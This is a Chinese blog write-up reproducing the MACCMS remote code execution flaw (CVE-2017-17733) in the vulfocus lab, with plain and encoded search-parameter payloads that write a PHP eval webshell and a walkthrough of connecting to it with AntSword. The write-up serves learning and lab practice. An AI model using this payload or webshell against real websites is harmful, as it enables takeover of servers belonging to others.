MACCMS 远程命令执行漏洞复现(CVE-2017-17733)

目录

漏洞介绍

工具使用

环境搭建&复现过程


这是我复现的第一个漏洞(老天奶),有必要做一个详细的writeup。

漏洞介绍

MACCMS是一套采用PHP/MySQL数据库运行的全新且完善的强大视频电影系统。完美支持众多视频网站和高清播放器(youku,tudou,qvod,gvod等),完全免费开源。该漏洞主要的产生原因是CMS搜索页面搜索参数过滤不严导致直接eval执行PHP语句----(一句话木马)。(上面这段概述引自vulfocus哈)


工具使用

火狐浏览器(带有hackbar插件)

中国蚁剑(连接后门)


环境搭建&复现过程

咱们用在线靶场vulfocus(https://vulfocus.cn/)来搭建漏洞环境:

找到maccms远程命令执行漏洞并开启环境,进入到给出的ip:port地址,(每个人每次开启地址都不一样),我这里的是:123.58.224.8:27465

访问该地址:

可以看到我们进入一个看似正常的视频网站,当我们使用搜索功能时候,会发现URL地址栏中会多出一个++++index.php?m=vod-search++++

使用bp抓包会发现我们提交的搜索数据是以wd参数,(我电脑上的bp现在有点小问题不能演示)post方式提交到后台的,那么我们便可以在wd中精心构造一句话木马,上传到目标服务器中,在这里我们使用的是火狐浏览器中的HackBar插件(这个得自行下载)来进行post数据包的提交(当然用bp也是可以的)

该payload为:

wd={if-A:print(fputs(fopen(base64_decode(c.php),w),base64_decode(<?php @eval($_POST[c]); ?>1)))}{endif-A}

该payload大概意为创建一个c.php文件,并写入一句话木马

<?php @eval($_POST[c]); ?>

以及字符"1"

因为目前正在学upload-lab,所以对webshell稍作解释:

<?php?> 就是php标识,有了这个服务器才会把里面的内容当php解析。

@ 作用是,即使后面出现错误也不会报错,否则报错信息被目标主机看到,我们的渗透就失败了。(该错误是$_POST[c]中的变量c没有定义直接使用)

eval 意为把后面的所有内容都当作代码来执行。

$_POST[c] 意为以post方式来接受变量c的值。

并且为了防止过滤,我们将敏感字符转化为base64编码,上传到目标服务器后,再让服务器base64_decode解析加密内容,就可以成功上传webshell,从而控制目标站点。

加密后的密文:(也就是最终在HackBar中输入的数据)

wd={if-A:print(fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29)}{endif-A}

除一句话木马之外,还有一个字符"1",当我们上传payload并访问c.php文件时,前面的php当作代码执行,剩下1输出到网页中,所以如果我们能看到字符1,那就说明上传成功,接下来用蚁剑连接即可。

打开中国蚁剑(第一次用得初始化)右键添加数据:

输入URL和连接密码c即可控制对方主机

在/tmp目录下找到flag,漏洞复现完成

flag-{bmhd0da328b-51c7-489e-93e9-44aeb0a2cb0a}

欢迎大家批评指正!

相关推荐
cipher2 天前
ERC-4626 通胀攻击:DeFi 金库的"捐款陷阱"
前端·后端·安全
一次旅行5 天前
网络安全总结
安全·web安全
西岸行者5 天前
学习笔记:SKILLS 能帮助更好的vibe coding
笔记·学习
red1giant_star5 天前
手把手教你用Vulhub复现ecshop collection_list-sqli漏洞(附完整POC)
安全
悠哉悠哉愿意5 天前
【单片机学习笔记】串口、超声波、NE555的同时使用
笔记·单片机·学习
ZeroNews内网穿透5 天前
谷歌封杀OpenClaw背后:本地部署或是出路
运维·服务器·数据库·安全
别催小唐敲代码5 天前
嵌入式学习路线
学习
一名优秀的码农5 天前
vulhub系列-14-Os-hackNos-1(超详细)
安全·web安全·网络安全·网络攻击模型·安全威胁分析
Libraeking5 天前
05 安全边界:MCP Server 的权限沙箱与敏感数据保护
安全
毛小茛5 天前
计算机系统概论——校验码
学习